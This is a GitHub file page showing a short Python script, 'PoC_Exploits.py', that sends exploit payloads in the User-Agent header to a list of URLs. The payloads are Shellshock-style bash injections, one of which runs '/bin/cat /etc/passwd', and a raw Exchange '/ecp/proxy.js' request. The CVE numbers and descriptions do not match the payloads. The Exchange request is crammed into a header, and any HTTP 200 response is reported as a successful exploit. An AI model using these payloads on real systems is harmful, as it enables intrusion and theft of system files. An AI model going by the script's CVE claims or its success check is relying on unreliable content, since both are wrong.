-
-
Notifications
You must be signed in to change notification settings - Fork 2
/
PoC_Exploits.py
47 lines (43 loc) · 2.46 KB
/
PoC_Exploits.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import requests
# list of URLs to test
url_list = [
"https://example.com/vulnerable_endpoint1",
"https://example.com/vulnerable_endpoint2",
"https://example.com/vulnerable_endpoint3"
]
# payloads
payload1 = "POST /ecp/proxy.js HTTP/1.1\r\nHost: <target server>\r\nContent-Type: text/xml\r\nContent-Length: 224\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?><r at=\"S\" ln=\"ser\"><![CDATA[<?xml version=\"1.0\" encoding=\"utf-8\"?><ViewInfo><IsWidescreen>False</IsWidescreen><IsSplitterBar>False</IsSplitterBar><IsTreeView>False</IsTreeView><SelectedFolderId>AAAAA</SelectedFolderId><SelectedFolderChangeKey>CQAAAA==</SelectedFolderChangeKey></ViewInfo>]]><t></t></r>"
payload2 = "() { :; }; /bin/bash -c 'echo \"Vulnerable!\";'"
payload3 = "() { ignored;};echo 'Content-Type: text/plain'; echo; echo; /bin/cat /etc/passwd"
# Dictionary of proof-of-concept exploits
poc_exploits = {
"CVE-2022-20855": {
"payload": payload1,
"description": "Microsoft Exchange Server ProxyShell vulnerability (CVE-2022-20855) allows an attacker to execute arbitrary code on a Microsoft Exchange server by sending a specially crafted HTTP request to the server."
},
"CVE-2022-24115": {
"payload": payload2,
"description": "The GNU Bash shell is vulnerable to a command injection vulnerability (CVE-2022-24115) that allows an attacker to execute arbitrary commands on a vulnerable system by sending a specially crafted HTTP request with a malicious user agent header."
},
"CVE-2017-9834": {
"payload": payload3,
"description": "The Struts2 framework is vulnerable to a remote code execution vulnerability (CVE-2017-9834) that allows an attacker to execute arbitrary code on a vulnerable server by sending a specially crafted Content-Type header in a HTTP request."
},
# Add more exploits as needed
}
# Loop through each URL and test each proof-of-concept exploit
for url in url_list:
print(f"Testing {url}...")
for cve, exploit in poc_exploits.items():
print(f"Testing {cve}: {exploit['description']}...")
headers = {
"User-Agent": exploit["payload"]
}
try:
response = requests.get(url, headers=headers)
if response.status_code == 200:
print(f"{cve} exploit successful on {url}!")
else:
print(f"{cve} exploit failed on {url}.")
except requests.exceptions.RequestException as e:
print(f"Error: {e}")